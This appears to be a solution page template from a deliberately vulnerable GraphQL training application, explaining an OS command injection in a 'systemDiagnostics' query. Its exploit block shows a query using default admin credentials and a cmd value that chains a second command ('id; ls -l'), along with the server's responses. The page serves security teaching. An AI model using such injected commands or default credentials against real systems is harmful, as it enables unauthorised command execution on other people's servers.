{% extends 'partials/solutions/solution_base.html' %}
<!-- Start -->
{% block title %}Code Execution :: OS Command Injection #2{% endblock %}

{% block body %}
  <p>
    The query <code>systemDiagnostics</code> accepts certain UNIX binaries as parameters for debugging purposes, such as
    <code>whoami</code>, <code>ps</code>, etc. It acts as a restricted shell. However, it is protected
    with a username and password. After obtaining the <a href="http://127.0.0.1:5000/solutions#misc-weakpass">correct
    credentials</a>, the restricted shell seems to be bypassable by chaining commands together.
  </p>
{% endblock %}

{% block resources %}
  <li>
    <a href="https://www.netsparker.com/blog/web-security/command-injection-vulnerability/" target="_blank">
      <i class="fa fa-newspaper"></i> Netsparker - Command Injection
    </a>
  </li>
{% endblock %}

{% block exploits %}
  <pre class="bash">
    # System Diagnostics suffers from weak restricted shell implementation

    query {
      systemDiagnostics(username:"admin", password:"password", cmd:"id")
    }

    >>> Response:
    {
      "data": {
        "systemDiagnostics": "id: command not found"
      }
    }


    query {
      systemDiagnostics(username:"admin", password:"password", cmd:"id; ls -l")
    }

    >>> Response:
    {
      "data": {
        "systemDiagnostics": "total 128\ndrwxr-xr- .. COLORTERM=truecolor\n_=/usr/bin/env\n"
      }
    }
  </pre>
{% endblock %}
<!-- End -->